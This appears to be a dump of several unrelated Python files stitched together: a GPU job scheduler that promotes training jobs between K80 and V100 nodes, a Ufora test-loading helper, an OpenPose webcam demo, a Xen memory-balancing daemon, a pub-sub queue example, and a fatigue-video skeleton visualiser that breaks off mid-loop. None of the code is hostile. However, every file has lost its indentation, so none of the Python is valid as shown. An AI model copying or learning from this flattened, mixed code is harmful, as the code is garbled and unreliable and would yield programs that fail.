queue = [6, 33, 4, 43, 15, 47, 18, 42, 35, 40, 34, 20, 9, 29, 19, 22, 3, 5, 38, 7, 41, 39, 46, 17, 24, 28, 26, 45, 16, 14, 50, 48, 36, 27, 32, 8, 10, 49, 2, 12, 23, 1, 37, 31, 44, 21, 30, 11, 13, 25]
queue_dict = {}
arrival_time = 0
for item in queue:
arrival_time += np.random.poisson(30)
queue_dict[item] = arrival_time
queue_timer = time.time()
job_start = {} #{'49': time1, '15': time2...}
JCT = {}
PJCT = {} # practical complete time, not applicable for all jobs
PJCT_epoch = {}
overhead = {} # initialize so that every job starts with 0s overhead time
for item in queue:
overhead[str(item)] = 0
ovhd_start = {} # initialize this to 0 as well
for item in queue:
ovhd_start[str(item)] = 0
num_mig = {} # initialize migration time to 0
for item in queue:
num_mig[str(item)] = 0
queue_start = {} # initialize this to 0 as well
for item in queue:
queue_start[str(item)] = 0
queue_time = {} # initialize this to 0 as well
for item in queue:
queue_time[str(item)] = 0
index = 0
K80_cap = 8
V100_cap = 4
K80_used = 0
V100_used = 0
qualified_jobs = 0
K80_job = {}
for i in range(8):
K80_job[str(i)] = 'idle'
V100_job = {}
for i in range(4):
V100_job[str(i)] = 'idle'
all_job = []
qualified_job = []
pc_job = [] # list of jobs that are pratically completed
K80_node = 'c2180'
V100_node = 'd1020'
host_node = 'c0168'
testcase = args.tc
### also, change .h5 file folder in jobs ###
INTERVAL = 30 # make decision every 30s
QUALIFY_TIME = 300 # 600s or 10min as threshold
def send_signal(node, cmd):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10000 if node == K80_node else 10001
# Connect the socket to the port where the server is listening
server_address = (node, int(port))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
try:
# Send data
message = cmd.encode('utf-8') #b'save 35' #b'start 35 gpu 6'#b'save 35'
print('sending {!r}'.format(message))
sock.sendall(message)
while True:
data = sock.recv(32)
if 'success' in data.decode('utf-8'):
print('received {!r}'.format(data))
break
else:
print('waiting for success signal')
time.sleep(1)
finally:
#print('closing socket')
sock.close()
# takes in a list of jobs qualified for promote, returns a list of jobs that get upgraded, and an empty list for demoted
# jobs
def random_promotion(K80_free, V100_free, promote_list, force_demote):
num_demote = len(force_demote)
num_promote = len(promote_list)
# if more promote jobs than demote jobs, always demote all demote jobs
if len(promote_list) >= len(force_demote):
V100_avail = num_demote + V100_free
if V100_avail >= len(promote_list):
return promote_list, force_demote
else:
return random.sample(promote_list, V100_avail), force_demote
# if more demote jobs than promote jobs, always promote all promote jobs
else:
K80_avail = num_promote + K80_free
if K80_avail >= len(force_demote):
return promote_list, force_demote
else:
return promote_list, random.sample(force_demote, K80_avail)
def save_job(node, job): # save_job('c2176', '50')
# first wait for the job to be qualified for checkpointing
while True: # wait for ckpt_qual to be available
global ckpt_qual_dict
if ckpt_qual_dict['job'+job] == 1:
ckpt_qual_dict['job'+job] = 0
break
time.sleep(5)
send_signal(node, 'save ' + job)
global ovhd_start
global pc_job
#if job not in pc_job:
ovhd_start[job] = time.time()
# after sending checkpoint signal, wait for it to finish
while True:
time.sleep(5)
with open('checkpoint.json', 'r') as fp2:
checkpoint_dict = json.load(fp2)
if checkpoint_dict['job'+job] == 1: # checkpoint has finished
print('checkpointed successfully')
checkpoint_dict['job'+job] = 0 # reset it
json_file = json.dumps(checkpoint_dict)
with open('checkpoint.json', 'w') as fp2:
fp2.write(json_file)
break
# also check if job has already finished
global finish_dict
if finish_dict['job'+job] == 1:
break
# resume job
def resume_job(node, gpu, job): # resume_job('c2176', '3', '50')
while True:
if os.path.exists('pid.json'):
os.rename('pid.json', 'pid_lock.json')
break
else:
time.sleep(1)
cmd = 'resume ' + job + ' gpu ' + gpu
send_signal(node, cmd)
while True:
if os.path.exists('pid.json'):
break
else:
time.sleep(1)
# start job
def start_job(node, gpu, job):
# first wait for pid.json to show up, rename pid.json to pid_lock.json
# then in jobx.py, modify pid_lock.json, rename it to pid.json
# then wait for pid.json to show up
while True:
if os.path.exists('pid.json'):
os.rename('pid.json', 'pid_lock.json')
break
else:
time.sleep(1)
cmd = 'start ' + job + ' gpu ' + gpu
send_signal(node, cmd)
while True:
if os.path.exists('pid.json'):
break
else:
time.sleep(1)
# function that checks the tensorboard log of currently running jobs and logs practical complete jobs in a global list
# once a job reaches practical complete, it cannot be promoted. If it's already promoted, it gets demoted.
# criteria for practical complete: loss improvement has been smaller than 0.01 for last 3 consecutive epochs
def check_practical_complete(job_list):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
threshold = 0.001
global pc_job
global PJCT
global PJCT_epoch
for job in job_list:
# only check for job outside of practical complete job list
if job not in pc_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
loss_combine = []
for tc in dirs:
iterator = EventAccumulator(tc).Reload()
if len(iterator.Tags()['scalars']) > 0:
tag = 'loss' #iterator.Tags()['scalars'][2] # this is tag for loss
loss = [item.value for item in iterator.Scalars(tag)]
loss_combine += loss
# now that we have the loss at each epoch, we can check if it has reached practical complete
if len(loss_combine) >= 4:
latest_loss = loss_combine[-4:]
finished = True
for i in range(3):
# if the difference is >= 0.01, the job has not reached practical complete yet
if latest_loss[i] - latest_loss[i+1] >= threshold:
finished = False
break
if finished:
print('job' + job + ' has reached practical complete, the last 4 loss values are')
print(str(latest_loss))
pc_job.append(job)
PJCT[job] = int(time.time() - job_start[job])
PJCT_epoch[job] = len(loss_combine)
############### first clear finish status of all jobs ####################
pid_dict = {}
with open('pid.json', 'r') as fp:
pid_dict = json.load(fp)
for key in pid_dict:
pid_dict[key] = 0
json_file = json.dumps(pid_dict)
with open('pid.json', 'w') as fp:
fp.write(json_file)
checkpoint_dict = {}
with open('checkpoint.json', 'r') as fp:
checkpoint_dict = json.load(fp)
for key in checkpoint_dict:
checkpoint_dict[key] = 0
json_file = json.dumps(checkpoint_dict)
with open('checkpoint.json', 'w') as fp:
fp.write(json_file)
ckpt_qual_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
ckpt_qual_dict[job_name] = 0
finish_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
finish_dict[job_name] = 0
epoch_waste_dict = {}
with open('epoch_waste.json', 'r') as fp:
epoch_waste_dict = json.load(fp)
for key in epoch_waste_dict:
epoch_waste_dict[key] = 0
json_file = json.dumps(epoch_waste_dict)
with open('epoch_waste.json', 'w') as fp:
fp.write(json_file)
#################### background thread running TCP socket ########################
def thread_function():
# here listen on the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host_node, 10002)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
sock.listen(5)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
while True:
data = connection.recv(32)
if data:
data_str = data.decode('utf-8')
if 'param' in data_str:
pass
elif 'ckpt_qual' in data_str:
global ckpt_qual_dict
job_name = data_str.split(' ')[0]
ckpt_qual_dict[job_name] = 1
elif 'finish' in data_str:
global finish_dict
job_name = data_str.split(' ')[0]
finish_dict[job_name] = 1
print('received ' + data_str)
connection.sendall(b'success')
#time.sleep(5)
else:
break
finally:
connection.close()
x = threading.Thread(target=thread_function, daemon=True)
x.start()
###############################################################################
######################################################################
while True:
# termination condition:
# all the jobs have finished
################### check for finished jobs on K80 and V100 ##############################
for gpu, job in K80_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
K80_used -= 1
K80_job[gpu] = 'idle'
print('K80 finished job: ' + job)
JCT[job] = int(time.time() - job_start[job])
elif ovhd_start[job] != 0:
# check if ckpt overhead has finished
if ckpt_qual_dict['job'+job] == 1:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
for gpu, job in V100_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
V100_used -= 1
V100_job[gpu] = 'idle'
print('V100 finished job: ' + job)
JCT[job] = int(time.time() - job_start[job])
elif ovhd_start[job] != 0:
# check if ckpt overhead has finished
if ckpt_qual_dict['job'+job] == 1:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
################ check for practical finished jobs on K80 and V100 ######################
all_job = list(K80_job.values()) + list(V100_job.values())
check_practical_complete(all_job)
################ check run time of current K80 job, update qualified_job #################
for job in list(K80_job.values()):
if job not in qualified_job and job != 'idle':
runtime = int(time.time() - job_start[job])
if runtime >= QUALIFY_TIME:
qualified_job.append(job)
print('job' + job + ' has been qualified for promotion')
################ make promotion decisions ########################
V100_free = V100_cap - V100_used
K80_free = K80_cap - K80_used
# this returns available jobs for promotion. Has to be qualified, and currently in K80, but not practically complete
promote_list = list(set(qualified_job).intersection(list(K80_job.values())).difference(pc_job))
# this returns job forced to be demoted. Currently in V100, and is practically complete
force_demote = list(set(list(V100_job.values())).intersection(pc_job))
if len(promote_list) > 0:
promoted, demoted = random_promotion(K80_free, V100_free, promote_list, force_demote)
if len(promoted) > 0:
print('promoted jobs: ', promoted)
if len(demoted) > 0:
print('demoted jobs: ', demoted)
# stop all promoted jobs on K80
for gpu, job in K80_job.items():
if job in promoted:
save_job(K80_node, job)
K80_job[gpu] = 'idle'
K80_used -= 1
# stop all demoted jobs on V100
for gpu, job in V100_job.items():
if job in demoted:
save_job(V100_node, job)
V100_job[gpu] = 'idle'
V100_used -= 1
# resume promoted jobs on V100, make sure the gpu is idle
for job_new in promoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in V100_job.items():
if job == 'idle': # if gpu idle, schedule new job here
resume_job(V100_node, gpu, job_new)
#if job_new not in pc_job:
num_mig[job_new] += 1
V100_job[gpu] = job_new
promoted.remove(job_new)
V100_used += 1
break
else: # job has already finished before checkpointing
JCT[job_new] = int(time.time() - job_start[job_new])
promoted.remove(job_new)
# resume demoted jobs on K80, make sure the gpu is idle
for job_new in demoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in K80_job.items():
if job == 'idle': # if gpu idle, schedule new job here
resume_job(K80_node, gpu, job_new)
#if job_new not in pc_job:
num_mig[job_new] += 1
K80_job[gpu] = job_new
demoted.remove(job_new)
K80_used += 1
break
else: # job has already finished before checkpointing
JCT[job_new] = int(time.time() - job_start[job_new])
demoted.remove(job_new)
# perform a check, make sure all promoted/demoted jobs are scheduled
if len(promoted) > 0 or len(demoted) > 0:
raise ValueError('Bug with promotion scheme, more jobs than free gpus')
################ submit new jobs to vacant K80 GPUs ############################
# check if there are vacant K80s
## yes: submit jobs from queue
## no: do nothing
if K80_used < K80_cap:
K80_free = K80_cap - K80_used
for i in range(K80_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in K80_job.items():
if job == 'idle': # schedule new job here if idle
start_job(K80_node, gpu, job_new)
K80_job[gpu] = job_new
job_start[job_new] = time.time()
index += 1
K80_used += 1
time.sleep(5) # don't communicate too often
break
############### wait for next iteration
time.sleep(INTERVAL)
################ check if termination condition is met ################
K80_idle_num = sum(value == 'idle' for value in K80_job.values())
V100_idle_num = sum(value == 'idle' for value in V100_job.values())
if K80_idle_num == K80_cap and V100_idle_num == V100_cap and index == len(queue):
print('all jobs are finished!')
break
# get average JCT
average_JCT = np.average(list(JCT.values()))
JCT['average'] = average_JCT
average_PJCT = np.average(list(PJCT.values()))
PJCT['average'] = average_PJCT
average_overhead = np.average(list(overhead.values()))
overhead['average'] = average_overhead
# after everything is finished
with open('epoch_waste.json', 'r') as fp:
epoch_waste_dict = json.load(fp)
print('finished all runs')
JCT_name = testcase + '_JCT.json'
PJCT_name = testcase + '_PJCT.json'
PJCT_epoch_name = testcase + '_PJCT_epoch.json'
overhead_name = testcase + '_overhead.json'
num_mig_name = testcase + '_num_mig.json'
epoch_waste_name = testcase + '_epoch_waste.json'
ckpt_qual_name = 'ckpt_qual.json'
finish_name = 'finish.json'
with open(JCT_name, 'w') as fp1:
json.dump(JCT, fp1, sort_keys=True, indent=4)
with open(PJCT_name, 'w') as fp2:
json.dump(PJCT, fp2, sort_keys=True, indent=4)
with open(PJCT_epoch_name, 'w') as fp2:
json.dump(PJCT_epoch, fp2, sort_keys=True, indent=4)
with open(overhead_name, 'w') as fp3:
json.dump(overhead, fp3, sort_keys=True, indent=4)
with open(num_mig_name, 'w') as fp3:
json.dump(num_mig, fp3, sort_keys=True, indent=4)
with open(epoch_waste_name, 'w') as fp3:
json.dump(epoch_waste_dict, fp3, sort_keys=True, indent=4)
with open(ckpt_qual_name, 'w') as fp1:
json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4)
with open(finish_name, 'w') as fp1:
json.dump(finish_dict, fp1, sort_keys=True, indent=4)
|
UnitTestCommon.py
|
# Copyright 2015 Ufora Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import unittest
import os
import re
import traceback
import threading
import time
import nose
import nose.config
import nose.loader
import nose.plugins.manager
import nose.plugins.xunit
import logging
import ufora.native
import ufora.util.DirectoryScope as DirectoryScope
def sortedBy(elts, sortFun):
return [x[1] for x in sorted([(sortFun(y),y) for y in elts])]
def findTestFiles(rootDir, testRegex):
logging.info('finding files from root %s', rootDir)
testPattern = re.compile(testRegex)
testFiles = []
for directory, subdirectories, files in os.walk(rootDir):
testFiles += [os.path.join(directory, f) for f in files if testPattern.match(f) is not None]
return testFiles
def flattenToTestCases(suite):
if isinstance(suite, list) or isinstance(suite, unittest.TestSuite):
return sum([flattenToTestCases(x) for x in suite], [])
return [suite]
def fileNameToModuleName(fileName, rootDir, rootModule):
tr = (
fileName
.replace('.py', '')
.replace(rootDir, rootModule)
.replace(os.sep, '.')
)
if tr.startswith('.'):
return tr[1:]
return tr
def loadTestModules(testFiles, rootDir, rootModule):
modules = set()
for f in testFiles:
try:
with DirectoryScope.DirectoryScope(os.path.split(f)[0]):
moduleName = fileNameToModuleName(f, rootDir, rootModule)
logging.info('importing module %s', moduleName)
__import__(moduleName)
modules.add(sys.modules[moduleName])
except ImportError:
logging.error("Failed to load test module: %s", moduleName)
traceback.print_exc()
raise
return modules
def testCaseHasAttribute(testCase, attributeName):
"""Determine whether a unittest.TestCase has a given attribute."""
if hasattr(getattr(testCase, testCase._testMethodName), attributeName):
return True
if hasattr(testCase.__class__, attributeName):
return True
return False
def extractTestCases(suites):
testCases = flattenToTestCases(suites)
#make sure the tests are sorted in a sensible way.
sortedTestCases = sortedBy(testCases, lambda x: x.id())
return [x for x in sortedTestCases if not testCaseHasAttribute(x, 'disabled')]
def loadTestsFromModules(config, modules):
loader = nose.loader.TestLoader(config = config)
allSuites = []
for module in modules:
cases = loader.loadTestsFromModule(module)
allSuites.append(cases)
return allSuites
def loadTestCases(config, testFiles, rootDir, rootModule):
modules = sortedBy(loadTestModules(testFiles, rootDir, rootModule), lambda module: module.__name__)
allSuites = loadTestsFromModules(config, modules)
return extractTestCases(allSuites)
def startTimeoutThread(timeout):
'''
Start a thread which will eventually kill the process if the tests aren't finished
after the timeout
'''
assert timeout is not None
def killer():
time.sleep(timeout)
print >> sys.stderr
print >> sys.stderr, ' *** Test failed to finish in %s seconds, aborting *** ' % timeout
ufora.native.Tests.forceStackdump()
t = threading.Thread(target=killer)
t.daemon = True
t.start()
|
openpose.py
|
#!/usr/bin/env python
# necesita el paquete https://github.com/ildoonet/tf-pose-estimation
# ./openpose.py --dev=dir:../images/madelman.png
# ./openpose.py --size=400x300
import cv2 as cv
import numpy as np
from threading import Thread
import time
from umucv.util import putText
from umucv.stream import autoStream
from tf_pose.estimator import TfPoseEstimator
from tf_pose.networks import get_graph_path, model_wh
e = TfPoseEstimator(get_graph_path('mobilenet_thin'))
def detect(image):
humans = e.inference(image, resize_to_default=False, upsample_size=4)
#print(humans)
if humans:
print(list(humans[0].body_parts.keys()))
# FIXME
try:
print(humans[0].body_parts[7].x, humans[0].body_parts[7].y)
except:
pass
image = TfPoseEstimator.draw_humans(image, humans, imgcopy=False)
return image
frame = None
goon = True
result = None
def work():
global result
while goon:
if frame is not None:
t0 = time.time()
result = detect(frame)
t1 = time.time()
putText(result, '{:.0f}ms'.format(1000*(t1-t0)))
t = Thread(target=work,args=())
t.start()
for key, frame in autoStream():
cv.imshow('cam',frame)
if result is not None:
cv.imshow('openpose', result)
result = None
goon = False
|
qmemmand.py
|
import configparser
import socketserver
import logging
import logging.handlers
import os
import socket
import sys
import threading
import xen.lowlevel.xs
import vanir.qmemman
import vanir.qmemman.algo
import vanir.utils
SOCK_PATH = '/var/run/vanir/qmemman.sock'
LOG_PATH = '/var/log/vanir/qmemman.log'
system_state = vanir.qmemman.SystemState()
global_lock = threading.Lock()
force_refresh_domain_list = False
def only_in_first_list(l1, l2):
ret = []
for i in l1:
if not i in l2:
ret.append(i)
return ret
def get_domain_meminfo_key(domain_id):
return '/local/domain/'+domain_id+'/memory/meminfo'
class WatchType(object):
def __init__(self, fn, param):
self.fn = fn
self.param = param
class XS_Watcher(object):
def __init__(self):
self.log = logging.getLogger('qmemman.daemon.xswatcher')
self.log.debug('XS_Watcher()')
self.handle = xen.lowlevel.xs.xs()
self.handle.watch('@introduceDomain', WatchType(
XS_Watcher.domain_list_changed, False))
self.handle.watch('@releaseDomain', WatchType(
XS_Watcher.domain_list_changed, False))
self.watch_token_dict = {}
def domain_list_changed(self, refresh_only=False):
"""
Check if any domain was created/destroyed. If it was, update
appropriate list. Then redistribute memory.
:param refresh_only If True, only refresh domain list, do not
redistribute memory. In this mode, caller must already hold
global_lock.
"""
self.log.debug('domain_list_changed(only_refresh={!r})'.format(
refresh_only))
got_lock = False
if not refresh_only:
self.log.debug('acquiring global_lock')
global_lock.acquire()
got_lock = True
self.log.debug('global_lock acquired')
try:
curr = self.handle.ls('', '/local/domain')
if curr is None:
return
# check if domain is really there, it may happen that some empty
# directories are left in xenstore
curr = list(filter(
lambda x:
self.handle.read('',
'/local/domain/{}/domid'.format(x)
) is not None,
curr
))
self.log.debug('curr={!r}'.format(curr))
for i in only_in_first_list(curr, self.watch_token_dict.keys()):
# new domain has been created
watch = WatchType(XS_Watcher.meminfo_changed, i)
self.watch_token_dict[i] = watch
self.handle.watch(get_domain_meminfo_key(i), watch)
system_state.add_domain(i)
for i in only_in_first_list(self.watch_token_dict.keys(), curr):
# domain destroyed
self.handle.unwatch(get_domain_meminfo_key(i), self.watch_token_dict[i])
self.watch_token_dict.pop(i)
system_state.del_domain(i)
finally:
if got_lock:
global_lock.release()
self.log.debug('global_lock released')
if not refresh_only:
system_state.do_balance()
def meminfo_changed(self, domain_id):
self.log.debug('meminfo_changed(domain_id={!r})'.format(domain_id))
untrusted_meminfo_key = self.handle.read(
'', get_domain_meminfo_key(domain_id))
if untrusted_meminfo_key == None or untrusted_meminfo_key == b'':
return
self.log.debug('acquiring global_lock')
global_lock.acquire()
self.log.debug('global_lock acquired')
try:
if force_refresh_domain_list:
self.domain_list_changed(refresh_only=True)
system_state.refresh_meminfo(domain_id, untrusted_meminfo_key)
finally:
global_lock.release()
self.log.debug('global_lock released')
def watch_loop(self):
self.log.debug('watch_loop()')
while True:
result = self.handle.read_watch()
self.log.debug('watch_loop result={!r}'.format(result))
token = result[1]
token.fn(self, token.param)
class VMemmanReqHandler(socketserver.BaseRequestHandler):
"""
The RequestHandler class for our server.
It is instantiated once per connection to the server, and must
override the handle() method to implement communication to the
client.
"""
def handle(self):
self.log = logging.getLogger('qmemman.daemon.reqhandler')
got_lock = False
try:
# self.request is the TCP socket connected to the client
while True:
self.data = self.request.recv(1024).strip()
self.log.debug('data={!r}'.format(self.data))
if len(self.data) == 0:
self.log.info('EOF')
if got_lock:
global force_refresh_domain_list
force_refresh_domain_list = True
return
# XXX something is wrong here: return without release?
if got_lock:
self.log.warning('Second request over qmemman.sock?')
return
self.log.debug('acquiring global_lock')
global_lock.acquire()
self.log.debug('global_lock acquired')
got_lock = True
if system_state.do_balloon(int(self.data.decode('ascii'))):
resp = b"OK\n"
else:
resp = b"FAIL\n"
self.log.debug('resp={!r}'.format(resp))
self.request.send(resp)
except BaseException as e:
self.log.exception(
"exception while handling request: {!r}".format(e))
finally:
if got_lock:
global_lock.release()
self.log.debug('global_lock released')
parser = vanir.tools.VanirArgumentParser(want_app=False)
parser.add_argument('--config', '-c', metavar='FILE',
action='store', default='/etc/vanir/qmemman.conf',
help='qmemman config file')
parser.add_argument('--foreground',
action='store_true', default=False,
help='do not close stdio')
def main():
args = parser.parse_args()
# setup logging
ha_syslog = logging.handlers.SysLogHandler('/dev/log')
ha_syslog.setFormatter(
logging.Formatter('%(name)s[%(process)d]: %(message)s'))
logging.root.addHandler(ha_syslog)
# leave log for backwards compatibility
ha_file = logging.FileHandler(LOG_PATH)
ha_file.setFormatter(
logging.Formatter('%(asctime)s %(name)s[%(process)d]: %(message)s'))
logging.root.addHandler(ha_file)
if args.foreground:
ha_stderr = logging.StreamHandler(sys.stderr)
ha_file.setFormatter(
logging.Formatter('%(asctime)s %(name)s[%(process)d]: %(message)s'))
logging.root.addHandler(ha_stderr)
sys.stdin.close()
logging.root.setLevel(parser.get_loglevel_from_verbosity(args))
log = logging.getLogger('qmemman.daemon')
config = configparser.SafeConfigParser({
'vm-min-mem': str(vanir.qmemman.algo.MIN_PREFMEM),
'dom0-mem-boost': str(vanir.qmemman.algo.DOM0_MEM_BOOST),
'cache-margin-factor': str(vanir.qmemman.algo.CACHE_FACTOR)
})
config.read(args.config)
if config.has_section('global'):
vanir.qmemman.algo.MIN_PREFMEM = \
vanir.utils.parse_size(config.get('global', 'vm-min-mem'))
vanir.qmemman.algo.DOM0_MEM_BOOST = \
vanir.utils.parse_size(config.get('global', 'dom0-mem-boost'))
vanir.qmemman.algo.CACHE_FACTOR = \
config.getfloat('global', 'cache-margin-factor')
log.info('MIN_PREFMEM={algo.MIN_PREFMEM}'
' DOM0_MEM_BOOST={algo.DOM0_MEM_BOOST}'
' CACHE_FACTOR={algo.CACHE_FACTOR}'.format(
algo=vanir.qmemman.algo))
try:
os.unlink(SOCK_PATH)
except:
pass
log.debug('instantiating server')
os.umask(0)
server = socketserver.UnixStreamServer(SOCK_PATH, VMemmanReqHandler)
os.umask(0o077)
# notify systemd
nofity_socket = os.getenv('NOTIFY_SOCKET')
if nofity_socket:
log.debug('notifying systemd')
s = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
if nofity_socket.startswith('@'):
nofity_socket = '\0%s' % nofity_socket[1:]
s.connect(nofity_socket)
s.sendall(b"READY=1")
s.close()
threading.Thread(target=server.serve_forever).start()
XS_Watcher().watch_loop()
|
pubsub.py
|
import cmd
from queue import Queue
from threading import Thread
class Pub1(cmd.Cmd):
intro = 'pub-sub example'
prompt = '>>> '
file = None
def __init__(self, dispatch: Queue):
super().__init__()
self.dispatch = dispatch
def do_f1(self, arg):
self.dispatch.put(('f1', 'pub1 A'))
def do_f2(self, arg):
self.dispatch.put(('f2', 'pub1 B'))
print ("do_f2 called....")
def do_f3(self, arg):
self.dispatch.put(('f3', 'pub1 C'))
def do_allo(self, arg):
print ("\nAllo!\n")
def do_exit(self, arg):
return True
def command_queue_fn(q: Queue):
next = q.get()
while next is not None:
next[0](*(next[1:]))
next = q.get()
def dispatcher_fn(dispatch: Queue, command: Queue, subscribers: list):
next = dispatch.get()
while next is not None:
name = next[0]
args = next[1:]
for sub in subscribers:
try:
# command.put((getattr(sub, '%s' % name), *args)) Incompatible Python rev < 3.5
command.put(([getattr(sub, str(name))] + list(args)))
print (str(name))
except AttributeError:
pass
next = dispatch.get()
class Sub1:
def f1(self, msg):
print('Sub1, f1 :', msg)
def f2(self, msg):
print('Sub1, f2 :', msg)
class Sub2:
def f1(self, msg):
print('Sub2, f2 :', msg)
def f3(self, msg):
print('Sub2, f3 :', msg)
if __name__ == '__main__':
command_queue = Queue()
dispatch_queue = Queue()
pub1 = Pub1(dispatch_queue)
sub1 = Sub1()
sub2 = Sub2()
thread_command_queue = Thread(target=command_queue_fn, name='cmd_queue', args=(command_queue,))
thread_dispatcher = Thread(target=dispatcher_fn, name='dispath_queue', args=(dispatch_queue, command_queue, [sub1, sub2]))
thread_command_queue.start()
thread_dispatcher.start()
pub1.cmdloop()
dispatch_queue.put(None)
command_queue.put(None)
thread_command_queue.join()
thread_dispatcher.join()
|
vis_stretch.py
|
# -*- coding: UTF-8 -*-
'''=================================================
@Author :zhenyu.yang
@Date :2020/11/5 11:37 AM
=================================================='''
import sys
sys.path.append('./')
sys.path.insert(0,'/data/zhenyu.yang/modules')
import cv2
import json
import numpy as np
import random
import copy
from multiprocessing import Process
import os
try:
from .skeleton_vis_tools import draw_points_and_skeleton,joints_dict
except:
from skeleton_vis_tools import draw_points_and_skeleton,joints_dict
def getFiles(path, suffix,prefix):
return [os.path.join(root, file) for root, dirs, files in os.walk(path)
for file in files if file.endswith(suffix) and file.startswith(prefix)]
def get_ear(ldmk):
eps = 1e-5
get_distance = lambda x,y:((x[0]-y[0])**2 + (x[1]-y[1])**2 + eps)**0.5
w = get_distance(ldmk[0],ldmk[4])
h = get_distance(ldmk[2],ldmk[6])
ear = h/w
ear = min(ear,0.7)
return ear
def get_ear_height(ldmk):
heights = [ldmk[2][1]-ldmk[6][1],ldmk[1][1]-ldmk[7][1],ldmk[3][1]-ldmk[5][1]]
return np.mean(np.abs(heights))
def get_fea_label(img_info):
skeleton = np.zeros((17,3))
if 'skeleton' in img_info and img_info['skeleton'] is not None and len(img_info['skeleton']) > 4:
for i ,pt in enumerate(img_info['skeleton']):
if i >= 11:
break
if pt[1] > 0:
skeleton[i] = [pt[0],pt[1],1]
return skeleton
def get_perclose(height_list):
max_height = max(height_list)
preclose_list = [1 - v/max_height for v in height_list]
preclose_50 = sum(v > 0.5 for v in preclose_list)
preclose_70 = sum(v > 0.7 for v in preclose_list)
preclose_90 = sum(v > 0.9 for v in preclose_list)
return [preclose_50,preclose_70,preclose_90]
def get_eye_movement(height_list):
height_change = [abs(height_list[i+1] - height_list[i]) for i in range(len(height_list)-1)]
return sum(v>1 for v in height_change) / len(height_list)
def list2num(slice_list):
num_list = []
for slice in slice_list:
num_list.extend(list(range(slice[0], slice[1] + 1)))
return num_list
def is_stretch(stretch_list,left_index,right_index):
# 1 : stretch 0: normal -1 : ignore
max_union = -1
frame_len = right_index - left_index
for stretch in stretch_list:
stretch_len = abs(stretch[1] - stretch[0])
temp_left = max(left_index,stretch[0])
temp_right = min(right_index,stretch[1])
if [temp_left,temp_right] in [stretch,[left_index,right_index]]:
return 1
union = (temp_right - temp_left) /( min(stretch_len,frame_len) + 0.1)
max_union = max(max_union,union)
if max_union < 0.2:
return 0
return -1
def get_batch_data(video_list,suffix,dst_dir,time_len = 10):
random.shuffle(video_list)
half_frame_len = time_len*25//2
while True:
if len(video_list) == 0:
break
video_path = video_list.pop()
json_path = video_path.replace('.mp4', suffix)
if not os.path.exists(json_path):
continue
with open(json_path, 'r') as f:
big_json = f.readlines()
skeleton_list = []
for json_info in big_json:
try:
json_info = json.loads(json_info.strip())
except:
continue
skeleton_list.append(get_fea_label(json_info))
stretch_path = video_path.replace(os.path.basename(video_path), 'stretch.json')
if not os.path.exists(stretch_path):
continue
with open(stretch_path, 'r') as f:
stretch_list = json.load(f)
stretch_index_list = []
normal_index_list = []
cap = cv2.VideoCapture(video_path)
for i in range(len(skeleton_list)):
ret,frame = cap.read()
if not ret:
break
if i % 5 != 0 :
continue
if i < half_frame_len or i >= len(skeleton_list) - (half_frame_len+1):
continue
temp_stretch = is_stretch(stretch_list,i-half_frame_len,i+half_frame_len)
if temp_stretch == 1:
stretch_index_list.append(i)
npy_name = '_'.join(video_path.split(os.sep)[-4:]).replace('.mp4','')
npy_name = '{}__{}__{}.jpg'.format(1,npy_name,i)
pt = skeleton_list[i]
pt[:, :2] = pt[:, 1::-1]
frame = draw_points_and_skeleton(frame, pt, joints_dict()[
'coco']['skeleton'], person_index=0,
points_color_palette='gist_rainbow',
skeleton_color_palette='jet',
points_palette_samples=10)
cv2.imwrite(os.path.join(dst_dir,npy_name),frame)
cap.release()
def split(input,num=60):
random.shuffle(input)
ans = []
sep = len(input) //num
for i in range(num-1):
ans.append(input[i*sep:(i+1)*sep])
ans.append(input[(num-1)*sep:])
return ans
if __name__ == '__main__':
version = 'v0.1'
suffix = '_{}.json'.format(version)
src_dir_dict = {'train':'/data/weiyu.li/DMSData/FatigueView/raw_video',
'test':'/data/weiyu.li/DMSData/FatigueView/test_video'
}
src_dir_dict = {'test':'/data/weiyu.li/DMSData/FatigueView/test_video'
}
camera_list = ['ir_down','ir_front','ir_left','ir_left_up','ir_up','rgb_down','rgb_front','rgb_left','rgb_left_up','rgb_up']
camera_list = ['ir_left_up']
# camera_list = ['rgb_left_up']
data_type = 'train'
camera_id = 0
for data_type in src_dir_dict.keys():
for camera_id in range(len(camera_list)):
src_dir = src_dir_dict[data_type]
camera_type = camera_list[camera_id]
dst_dir = './vis/{}/{}'.format(data_type,camera_type)
if not os.path.exists(dst_dir):
os.makedirs(dst_dir)
video_list = getFiles(src_dir, '.mp4', camera_type)
if data_type == 'test':
video_list = [v for v in video_list if 'fengchunshen' not in v and 'panbijia' not in v]
if data_type == 'train':
video_list = [v for v in video_list if 'zhaoxinmei' not in v]
all_num = 60000
running_num = 32
running_num = min(running_num,len(video_list))
batch_size = all_num//running_num
split_videos = split(video_list, running_num)
process_list = []
for i in range(running_num):
